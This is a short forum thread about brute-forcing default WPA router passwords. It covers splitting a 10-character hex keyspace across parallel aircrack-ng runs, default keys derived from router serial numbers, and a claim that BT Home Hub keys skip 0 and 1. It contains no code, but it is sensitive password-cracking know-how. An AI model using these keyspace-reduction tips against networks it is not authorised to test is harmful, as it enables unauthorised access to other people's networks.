Results 1 to 4 of 4

Thread: Faster ?! (Default) WPA Password Cracker

  1. #1
    Just burned his ISO
    Join Date
    Nov 2008
    Posts
    3

    Question Faster ?! (Default) WPA Password Cracker

    The Idea:

    Default WPA passwords are mostly 10 chars (HEXCHARS) -> 0123456789ABCDEF

    oke,

    if you want to make a wordlist, the size of the list will be more then 10Gb! so leave it..

    now... if we grep the source of aircrack-ng and a wordlist maker...

    Modified AirCrack-NG Description/Parameters.

    aircrack-wpa-ng [handshake-file] [Start Password] [End Password]

    and open it like 50 times / threads.

    First .. -> 00000000000 - 1000000000
    Sec .. -> 10000000001 - 2000000000

    ,,
    ,,
    ,,
    ,,
    Last -> F0000000000 -> FFFFFFFFFF

    If you have a fast comp. then we can break it in more threads..

    Is this a solution for WPA cracking without wordlist?!, or does a bruteforcer exist? I didn't google it but don't think so..

    If the password is found kill all active windows.. and store it in /tmp/WPA-FOUND.txt ..

    :\ I think it's better then creating a 10char HEXDEC wordlist.. for the USB Drive

    If you think it's usefull I gonna take a look this week.. And finish it

  2. #2
    Developer
    Join Date
    Mar 2007
    Posts
    6,124

    Default

    Default WPA passwords are mostly 10 chars (HEXCHARS) -> 0123456789ABCDEF
    I'm not sure where your getting your information but this is highly incorrect. WPA passwords can be between 8 and 63 chars. and most routers (to my knowledge) dont have a default.

  3. #3
    Senior Member Talkie Toaster's Avatar
    Join Date
    Jun 2008
    Location
    Scotland
    Posts
    131

    Default

    Most HOME routers i've come across use 10 digit default password, usually derived from some kind of algo applied to the serial number (10 digits can also be made into a 64bit WEP pass), and 26 digits is getting common too on newer routers.

    Your best hope against these is research, if for example you know manufacturer A uses a MD5 hash of the serial number to produce the default password, then you would know to only target a-f and 0-9 (MD5 only outputs hex so a-f,0-9) or others use only capital letters in their default password.

    This would all be defeated by the user simply changing their passphrase off the default one, sadly they'd probably change it to a dictionary word.....

    google google google man!
    also GNU citizen, check out Adrian Pastor's work with SOHO routers

    TT
    Programming today is a race between software engineers striving to build bigger and better idiot-proof programs, and the Universe trying to produce bigger and better idiots. So far, the Universe is winning.

  4. #4
    Member
    Join Date
    Jun 2008
    Posts
    129

    Default

    Quote Originally Posted by Talkie Toaster View Post
    Most HOME routers i've come across use 10 digit default password, usually derived from some kind of algo applied to the serial number (10 digits can also be made into a 64bit WEP pass), and 26 digits is getting common too on newer routers.

    Your best hope against these is research, if for example you know manufacturer A uses a MD5 hash of the serial number to produce the default password, then you would know to only target a-f and 0-9 (MD5 only outputs hex so a-f,0-9) or others use only capital letters in their default password.

    This would all be defeated by the user simply changing their passphrase off the default one, sadly they'd probably change it to a dictionary word.....

    google google google man!
    also GNU citizen, check out Adrian Pastor's work with SOHO routers

    TT
    I know i've spoken about this before but its one of my favourite subjects, the BTHomeHub.
    I have a new V2.0, the 11n one. There was a rumor doing to rounds that the default WPA2 key doesn't uses 0 and 1. I can confirm that my default doesn't have those to numbers but I haven't used any other BTHH V2.0 to check this. This could mean that it uses 2-9 and a-f and its only 10 digits.

    The other thing I have found is that most BT users don't even log into there routers as they face a page to change their admin login password and if the page appears then it means they haven't changed there key.

    Its true about the serial number being used to generate to key and the s/n uses 0-9 and A-Z.

    The the orignal poster, it may be worth doing a bit of research on the types of router that broadband supplies use and default password lenghs. AOL and SKY in the UK use Netgear and they have a defauly algorithm.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •